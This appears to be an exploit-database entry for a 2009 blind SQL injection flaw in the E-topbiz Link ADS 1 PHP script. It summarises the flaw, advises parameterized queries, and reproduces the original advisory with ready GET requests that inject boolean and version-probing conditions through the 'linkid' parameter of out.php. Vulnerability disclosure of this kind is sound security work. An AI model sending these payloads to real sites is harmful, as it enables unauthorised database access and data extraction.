header-logo
Suggest Exploit
vendor:
Link ADS 1 PHP script
by:
Jose Luis Gongora Fernandez
7,5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Link ADS 1 PHP script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

E-topbiz Link ADS 1 PHP script (linkid) Blind SQL Injection Vulnerability

This vulnerability allows an attacker to inject malicious SQL queries into the vulnerable application. The attacker can use the 'linkid' parameter to inject malicious SQL queries and extract sensitive information from the database. The proof of concept is demonstrated by sending a GET request to the '/out.php' page with the 'linkid' parameter set to '50+and+1=1' (true) and '50+and+1=2' (false). The exploit is demonstrated by sending a GET request to the '/out.php' page with the 'linkid' parameter set to '50+and+substring(@@version,1,1)=4' and '50+and+substring(@@version,1,1)=5'.

Mitigation:

The application should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to prevent malicious input from being passed to the application.
Source

Exploit-DB raw data:

# E-topbiz Link ADS 1 PHP script (linkid) Blind SQL Injection Vulnerability
# url: http://e-topbiz.com/oprema/pages/linkads1.php
#
# Author: Jose Luis Gongora Fernandez 'aka' JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://hack0wn.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: All Hackers!

proof of concept:
GET /out.php?linkid=50+and+1=1 (true)
GET /out.php?linkid=50+and+1=2 (false)

exploit :
GET /out.php?linkid=50+and+substring(@@version,1,1)=4
GET /out.php?linkid=50+and+substring(@@version,1,1)=5


# _h0_

Navigation

Suggest Exploit

Services By CQR